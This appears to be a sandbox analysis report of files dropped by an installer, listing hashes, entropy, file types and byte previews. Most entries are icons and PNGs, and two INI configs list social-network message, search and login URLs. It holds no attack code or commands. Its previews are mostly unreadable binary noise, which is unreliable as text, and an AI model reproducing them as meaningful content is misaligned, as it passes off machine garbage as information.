                                                                                                                                                                                                                                                          SHA-256:4DE87763921B6DC43B630BDEB41C7CFB81290DCBDA2E1F3E4B29ECE0A364EFF7
                                                                                                                                                                                                                                                          SHA-512:40E4FBF36D482EB2A1F21DA82973A06E209BBCB4FB90091B21BC750A0BF544F4825D54F269D785B18F6CC2708EE5CAE664A8E98197DB84AB210991C9A844E765
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ..........................n...n...q...v...w...v...w...x...x...w...w...w...v...w...v...w...v...w...w...w...v...w...w...x...w...v...w...w...u...q...n...n...n...w.......{...y...y...x...z...z...y...y...y...w...x...x...z...y...x...y...y...x...x...x...y...x...z...x...z...{.......w...n...s.......t...r...r...s...r...r...s...s...r...r...r...r...r...q...s...q...s...s...s...s...r...t...s...s...r...r...r...r.......s...y.......s...r...t...s...u...u...s...s...t...u...u...u...t...s...s...s...u...u...s...u...t...t...s...t...t...s...t...u.......x...z.......w...v...v...u...u...w...v...v...u...v...u...v...w...v...u...t...u...u...u...v...w...u...u...v...u...v...u...v.......y...{.......v...w...v...v...w...x...v...x...w...x...w...u...v...u...w...u...u...u...v...x...v...w...v...v...x...x...x...w.......z...|.......x...y...y......................{...y....P...................O..x...x...z...y......................x...z...y.......{...|.......{...z...z......................z
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):476
                                                                                                                                                                                                                                                          Entropy (8bit):7.439177858532215
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7iFaKslEOmLWhwS6ANwTrK7GqrOGZdM0Rtc:7aLlCWhP2fqrOLMtc
                                                                                                                                                                                                                                                          MD5:6591C6A99B1C83E8E82DFBC47DB14D09
                                                                                                                                                                                                                                                          SHA1:391F976F86FDA9E1DDA177B835E38BDEB4916F63
                                                                                                                                                                                                                                                          SHA-256:B6EECDBD6BE6362A75FD90B6E8B322EF64CAFCF9AB207411DAAA255C88E50572
                                                                                                                                                                                                                                                          SHA-512:D10B15A84A63C6C6BAAE451363C60DEC05C39BF7559CB26A205B800EAC5E40271DB17C3A49AA2BBC2FF25FF7FC2FB32AB7D0521BE071B18FFF91CF18DFC80C08
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....IDATX...+Cq....Y...$b\xO..R".z#g....BK.9..6.6.a.Vl...(/M..b.ll4g...su....{^.2..y.4I@.......k....Q...u..$..l.n....|....|)h...N..F...WUY..\.p0u0j.@.....0..n;,s%.I.,U.'..o...O.1.MM0...&...J\X./....S...x.......f...d....'_.O.r..A..m.[(..a'.#.?....Z.80.."...D.>.5.3.>...b.P|.T...'...i/l..B....A.:...<G!p...X. ......(.......*...T!..;.=.(......V..V...N...........B..n..W....h.0.po6.9.e.=+..$..@t..R|.).>>....~........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.713510909371912
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:+bQZkzhN60+qAWGgEoP30eRH4VAIEftmtCCPV7VrllypoC:z6N6/WGChsKUtHVH4poC
                                                                                                                                                                                                                                                          MD5:9D7DB8AFD191BC67C9E410619010B1CB
                                                                                                                                                                                                                                                          SHA1:19B0D0D72B3656FEE507E633739CF71B3FD642E9
                                                                                                                                                                                                                                                          SHA-256:1A27BB476C1E83AFF622369138CA27B866B6D7865A35E021A0985FA3CCB023A3
                                                                                                                                                                                                                                                          SHA-512:98D3105521E6E5625FF8E822A327455624395347C5CB5736720164078842E84411531BE03C3C59166DA8F5EB3A682EA5D0BCF6F74C97E9DE61EE4505BF19FDD2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ......................................................................................................................................................................................................................................................................................................D...C...B..A...@...@...?...>...=...=...<...;...:...:...9...8...8...8...8...8...8...8...8...8..8...8.......................E...D..F...P...R"..V'..U&..T&..S%..S$..R$..Q#..P#..O"..N"..M!..M!..L ..K...J...I...H...F...C...@...9...8..8...................E...G...X'..X(..X(..W'..V'..U&..T%..S%..R$..R$..Q#..P#..O"..N"..M!..L ..L ..K...J...I...H...G...F...E...9...8...................F..S!..Z)..Y)..X(..W(..W'..V&..U&..T%..S%..R$..Q$..Q#..P#..O"..N!..M!..L ..K ..K...J...I...H...G...F...@...8...................G...V%..[*..Z)..Y)..X(..W'..V'..V&..U&..T%..S%..R$..Q$..g...X..X..X..X..X..X..X..g...I...H...G...C...8...................H...\+..[*..[*..Z)..Y)..X(..W(..W
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.673387955380768
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:Q0YV+XQJt9CeeTQLvNDg9m8nlVlurzJW37a5Mm9bYHEh:9YxCeQQ5DgM8nlVgr9W3emm9bYHEh
                                                                                                                                                                                                                                                          MD5:ECDF723831AEFF58D496FC70C8283BF6
                                                                                                                                                                                                                                                          SHA1:F4FAC6B07305CFB612625391FC50333071665167
                                                                                                                                                                                                                                                          SHA-256:97D0CF1DB2088A9D3EDDE44EF4BBE8731C82FE8539C89BB45A72E9F131BDCE19
                                                                                                                                                                                                                                                          SHA-512:B7FCDCF49BE8507950EFE02890BE516A99BACE7DAB1D6571DF4037C95011491944AE107EE5E507BFDAF342048264AA623E44AAE66824088333DC343051734866
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ..............................6...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...5...6.......:...L...U...N...M...N...Q...T...X...]...b...f...j..!n.."q..#s..$s..#s.."q..!n...j...f...a...]...X...T...Q...N...N...U...L...:...:...X...F...@...?...?...B...E...I...N...S...W...[...^...b...c...c...c...a...^...[...V...R...M...I...E...B...?...@...F...X...:...;...U...D...A...@...@...A...C...F...J...M...P...S...V...X...Y...Z...Y...X...V...S...P...L...I...F...C...A...@...A...D...U...;...<...V...F...C...B...A...@...A...C...E...H...J...L...N...O...P...P...O...O...M...K...I...G...E...C...A...A...B...C...F...V...<...=...W...G...F...C...B...A...@...A...B...C...A...B...D...G...H...H...G...E...B...B...C...C...B...A...A...B...C...F...G...W...=...=...Y...I...G...F...D...C...B...A...B...>...5...1|..5...>...C...C...?...6...1|..5...?...B...A...B...C...D...F...G...I...Y...=...>...[...K...I...I...G...G...D...C...C...D
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):2.907368134642011
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:WRkPCxmKeaeee6Sz1WDl2bbkVmB4g7mGpzSl:0xmKfSz18C+wQl
                                                                                                                                                                                                                                                          MD5:5738301E256B421DA693EFD4DC523727
                                                                                                                                                                                                                                                          SHA1:18C0624ED82BA03C8A1FBDB720F47DAEE5A694E3
                                                                                                                                                                                                                                                          SHA-256:67CD0A812DBCB3FAC6D87A01EF134D66937DA8166602854CB6FC01DA7A94388D
                                                                                                                                                                                                                                                          SHA-512:75E6B019DBBA805982A4168D17FEB46DFF8C832DA1BA0A6B3C131725FB0D0ECD598532576620A086867EE679486819FB0332F25597E9FC1B42454E846B3EC84D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ............................................................................................................................................................................................G.......................................................................5...............................................................U...........................................(...........................................................................................u...........................0...........................................................................]...............................}...........5...................................................................................:...........................................................................................................................................................................................................~..................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):5.532691390134044
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:nY99Q99TqqeqQEqqeqQ4q0AqPwqKzj05pjskYoE6cCLa5v8XrimfI:vqqeqQEqqeqQ4q0AqPwqKzj05pjxzBaL
                                                                                                                                                                                                                                                          MD5:EA7CF6E021F69BF2044DC239F9875D65
                                                                                                                                                                                                                                                          SHA1:69699CA689463AC506D522CB95EA2507EE9D59F9
                                                                                                                                                                                                                                                          SHA-256:524AE1533708F5B47C73B4513662DAE775303FC2EF5D39B238D139C18864D24B
                                                                                                                                                                                                                                                          SHA-512:019AE06EA6F6CA327465EEBCBF54055CE833B5D5C1BB79AF89EE26351B088BB11E8E1E9544563FC663939D6D25DD2314BE208BDC0AFD6699741103E4C57CA090
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ..............................................................................................................................................................................................................................................................................................5y{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c..{c...5y............../..4..:..A..J...S...\...f...p...w..............................y...o...c..Y..P..G..@..;..3..............3..<...B...C...C...E...J...J...J...J...J...E...C...C...C...C...D...I...J...J...J...J...I...C...C...C...C...B...?..0..........;...G...I...I...I...I...K...Q...Q...Q...Q...Q...L...I...I...I...I...J...P...Q...Q...Q...Q...P...J...I...I...H...A..5...........<...J...O...I...I...I...I...K...Q...Q...Q...Q...Q...L...I...I...I...I...J...P...Q...Q...Q...Q...P...J...I...I...B..3...........<...J...Q...O...I...I...I...I...K...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.907302157036138
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:+BfZk7WDHWwgHz/8EKnha1Za+Wt4UhU6XkfAsq6BfyTLDJa8LaMahaavC:ykCrFEZ1k+Wt4UG54sqU6TJaoaMahaa
                                                                                                                                                                                                                                                          MD5:E6EB914C76409FE1F3D53E3C181CC9D9
                                                                                                                                                                                                                                                          SHA1:36A34D8F71B146A39A68F7C0AB02A566FCA24A85
                                                                                                                                                                                                                                                          SHA-256:060DFC41C4D3CCEFA3FD8E104302B42408DA7F54CA13096ED7836EF57C5B4D6D
                                                                                                                                                                                                                                                          SHA-512:7EA5748DF3C9229E166AC5578A23C56FEFC3E395A53D24305FB39D909F1F5ED5193A5F349824890C31D0AD90F7A6A574184A5E0E52C4BA83D868C71B94BB8B87
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ................................................................................................................................................................................................................................................................................................................[...................................................................................[...................................-..................................................................................................-......................................................................................................................................................[...........................................................................................................[.............................................................Q..'.....................*..................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):6.506385614203068
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:8++kbjhMq1a9dJsg987jefKQ4N8tttttttttttttttttt6n:v+kbjhMgxjefKVl
                                                                                                                                                                                                                                                          MD5:7B60FEEE9EF0D5277330748C9E1592A3
                                                                                                                                                                                                                                                          SHA1:54DCE445A030CF59EFC15B1AB977EE6358BC02BC
                                                                                                                                                                                                                                                          SHA-256:8891B8CB9AD98FB86BEA6DD1D3D8717C997440CEE2519565A3D9B46133FDB5DC
                                                                                                                                                                                                                                                          SHA-512:915D4CD6C012DB9EC96257D4B1AD40367E1DE0940A22695547EA55DACBD2DB3FCD869556886013618A5F09053C6C8CBE97950E798794B1E681488FE98F52E84F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... ....................................6-...Y>#.oO,.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.qQ-.oO,.Y>#.-......6...............OzU-..R...R..|O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..{O..|O...R...R.zU-....O.......%}W...P..vK..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..uI..vK...P.}W.....%6#.w.~M..uH..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..sG..uH..~M.6#.wsO(..xK..qF..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qE..qF..xK.sO(..b4.tG..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..tG..b4.c5.qD..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..nB..qD..c5.c5.pB..m@..l@..l@..l@..l@..k>..j=..j=..k
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0497425098377073
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:lLkTTTTTTTTTTTTTTTTTTTuTTTTTTTTTTTTTTTTTTTTTTTTTT/TTTTTTTTTTTTTt:J4Osj4
                                                                                                                                                                                                                                                          MD5:BF35CDB2F5E57DDFC543AF37943A1077
                                                                                                                                                                                                                                                          SHA1:0CF4E53B9B623BEF1E52BDEFCD31D155EAA4C9C2
                                                                                                                                                                                                                                                          SHA-256:82803689C06BF4D08AA1852D2C5CD3CE08258C828F12DF85C56BB6FC21A8E835
                                                                                                                                                                                                                                                          SHA-512:60CC6A06BD361CFD73D696717225CDB3B57278840606558D1B65390B531A590BDF08B2CB147B3159529DBB30D5C953C693E663D7E589B1E03756121EC3040199
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$$.........$.......5...<...C...G...K...O...S...S...P...N...K...E...>...7...0...#.......................................Q..........................................................................................................T...............|...................................................................................................................|..............................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [Instagram]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2361
                                                                                                                                                                                                                                                          Entropy (8bit):5.086790461308817
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:lkYaqeR/Mfg1mg6kL33dMLoXL2MK7hWNPE0hx8wgOV+U3DkROxPDv:ukgEEx6O+m+YPFYyJ
                                                                                                                                                                                                                                                          MD5:C846DA6EDAA3DA7B84D7C275232E7113
                                                                                                                                                                                                                                                          SHA1:48EFA8A9F71BA06A8AEF67786F234CCFF43EBFF1
                                                                                                                                                                                                                                                          SHA-256:4AAEB9FA982ADED9CE384AFDD72AD2D9F25F4D4803D29936D86F3836F71ED323
                                                                                                                                                                                                                                                          SHA-512:69259712A33EEAAAB99503C95E8F5F5614ECBD300065EED89181A26DFF15621F69D7B995212EBD6062A739C0A05B0BFED11E5B367AE91A6D80895519F75CA455
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Facebook]..ID="facebook.com"..NodeID=31..msgID="facebook.com/messages"..SearchID="facebook.com/search/results.php"..QueryID="?q="..LoginOk="facebook.com/?sk=welcome"..[Instagram]..ID="instagram.com"..NodeID=68..msgID=""..SearchID=""..QueryID=""..LoginOk=""..[Youtube]..ID="youtube.com"..NodeID=69..msgID=""..SearchID="youtube.com/results?search_query"..QueryID="?search_query"..LoginOk=""..[Twitter]..ID="twitter.com"..NodeID=33..msgID="twitter.com"..SearchID="twitter.com/i/#!/search"..QueryID="#!/search/"..LoginOk=""..[LinkedIn]..ID="linkedin.com"..NodeID=35..msgID="linkedin.com/msgToConns"..SearchID="linkedin.com/search"..QueryID="keywords="..LoginOk="linkedin.com/home"..[Myspace]..ID="myspace.com"..NodeID=32..msgID="http://www.myspace.com/my/mail"..SearchID="http://www.myspace.com/search/"..QueryID="?q="..LoginOk="myspace.com/home"..[VKontakte]..ID="vk.com"..NodeID=36..msgID="vk.com/im"..SearchID="http://vk.com/search"..QueryID="[q]="..LoginOk="vk.com/id"..[Odnoklassniki]..ID="ok.ru"..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47
                                                                                                                                                                                                                                                          Entropy (8bit):4.314915181326778
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:LqRlJbXyi6AA:2lBrA
                                                                                                                                                                                                                                                          MD5:D584582812D6A2E882BE885DD27E18E5
                                                                                                                                                                                                                                                          SHA1:388346E2897C7849D8F7E38A2450377023503257
                                                                                                                                                                                                                                                          SHA-256:63B34D170783C35985AB770AA19CE31E5AC8C90899423BE3A587B1CF17D417B8
                                                                                                                                                                                                                                                          SHA-512:C057ED6B8AD5DB53BD6D4FC556E03F3D6607D06A35D4FE91BD16B39E2DC9822FC7F1C740BA89297D31F645047B7941DE1501115ED2159180BC41B4B37C9F1D83
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Facebook..Instagram..Youtube..Twitter..LinkedIn
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [Marks]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):159
                                                                                                                                                                                                                                                          Entropy (8bit):4.674458029739085
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:91A2vTzyosXO/ovsh2vJ5Im5B9gHovNRN4o6bHiys6SIFv9oc:91A2vT+vm/h2v8ARNmi/6S+v9oc
                                                                                                                                                                                                                                                          MD5:6BD299C4CBF0029EA3F2F85BE0268693
                                                                                                                                                                                                                                                          SHA1:D45F93594FEEA321B778C691051CE9B47D13D480
                                                                                                                                                                                                                                                          SHA-256:BB9DBEEE227D18FFB6BE8AE4C33D681CC8A04FF1120F69EBF73E98E4302C6051
                                                                                                                                                                                                                                                          SHA-512:7EEDA815F4D91D0B588DA4B0F3EFB222CA189A8E42333B1664EC9520FD1BA68EF80ABC9F4B965CD5657A0334B8AED2C412DC79CEEF9EC34867CC429A51C1E95E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Guests]..ID="ok.ru/guests"..[Marks]..ID="ok.ru/marks"..[Friends]..ID="/friends"..[Photos]..ID="/photos"..[About]..ID="/about"..[Profiles]..ID="ok.ru/profile/"
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):468
                                                                                                                                                                                                                                                          Entropy (8bit):7.111349425204145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tezZiBETckBgamBUuzzCg5z7yDALRIjfq1iMrjWTa/IUlqauE:6v/78/nawkdmBUKf5zaIybM/WqTsY
                                                                                                                                                                                                                                                          MD5:37DA94ECD734F687EF2BD6B876BA3918
                                                                                                                                                                                                                                                          SHA1:20F07BFA0FCF04B900F5E78B503B9E7597BB652D
                                                                                                                                                                                                                                                          SHA-256:310373B5A0CA520244BBC8C21837F356781DE404EBEEAD88A44AC149B4B3EFE1
                                                                                                                                                                                                                                                          SHA-512:AF4D0182BE380DDD3972D905AE8800AA5720DD42FE62504090BBC5BF929771844C7F8DE7594851A562ED982FE3DD4EDA7B07D7177DD037C74A5D0EA510E7A863
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....CIDAT8Oc`...=./..'........x1H.^.~......p........2...b>..@..4o.u......?.j......Wt...2....\.......'./.|....`z...O..G. .0.............+{v.]Q....$...._.....x.y...@,...?~c...S....-^..... .~.....~.....?~.....s.C...o.....i..'....4..y...b.Y.s...Uo._....u.Pb..r.8..@..6d.....(.{..A... v..(iB.h..... ..................5BJ.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):468
                                                                                                                                                                                                                                                          Entropy (8bit):7.111349425204145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tezZiBETckBgamBUuzzCg5z7yDALRIjfq1iMrjWTa/IUlqauE:6v/78/nawkdmBUKf5zaIybM/WqTsY
                                                                                                                                                                                                                                                          MD5:37DA94ECD734F687EF2BD6B876BA3918
                                                                                                                                                                                                                                                          SHA1:20F07BFA0FCF04B900F5E78B503B9E7597BB652D
                                                                                                                                                                                                                                                          SHA-256:310373B5A0CA520244BBC8C21837F356781DE404EBEEAD88A44AC149B4B3EFE1
